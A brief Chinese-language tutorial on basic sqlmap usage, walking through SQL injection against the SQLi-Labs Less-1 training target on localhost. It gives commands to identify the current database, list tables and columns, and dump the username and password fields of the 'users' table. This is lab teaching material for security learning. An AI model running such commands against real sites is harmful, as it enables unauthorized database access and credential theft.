SQLMAP基本使用实例
-u参数(直接输入目标URL)
命令实例:sqlmap -u "http://127.0.0.1/sql/Less-1/?id=1"
验证过程
判断可注入的参数
判断可以用哪种SQL注入技术来注入
识别出所有存在的注入类型
尝试去判定数据库版本、开发语言、操作系统版本
目标靶机:SQL-Lab的Less-1
要求:利用SQLMAP实现注入,获取users表中存储的用户名、密码
-u参数的用法:
爆当前数据库的库名
sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --current-db
爆指定数据库中的表名
sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D 表名 --tables
sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security --tables
爆指定数据表中的字段名
sqlmap -u "http://127.0.0.1/Less-1/?id=1" -D 数据库名 -T 表名--columns
sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security -T users --columns
爆指定字段的值
sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D 数据库名 -T 表名 -C 字段名1,字段名2... (相互用逗号隔开)--dump
sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security -T users -C username,password --dump
